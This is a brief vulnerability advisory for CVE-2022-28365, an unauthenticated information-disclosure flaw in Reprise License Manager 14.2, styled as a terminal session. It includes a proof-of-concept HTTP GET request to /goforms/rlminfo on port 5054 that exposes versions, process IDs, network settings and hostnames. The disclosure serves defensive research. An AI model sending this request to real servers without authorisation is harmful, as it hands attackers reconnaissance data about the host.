giulia@homepage:~$ cat CVE-2022-28365.txt
#Product: RLM 14.2
#Vendor: Reprise Software
#CVE ID: CVE-2022-28365
#Vulnerability Title: Unauthenticated Information Disclosure
#Severity: Low
#Author(s): Giulia Melotti Garibaldi
#Date: 2022-03-29
#####################################################
Introduction:
Reprise License Manager 14.2 is affected by an Information Disclosure vulnerability via a GET request to /goforms/rlminfo. No authentication is required.
The information disclosed is associated with software versions, process IDs, network configuration, hostname(s), system architecture and file/directory information.
#####################################################
Vulnerability PoC:
#GET http://HOST:5054/goforms/rlminfo HTTP/1.1
#Host: HOST:5054
#Connection: keep-alive
#Content-Length: 0
giulia@homepage:~$ cd $HOME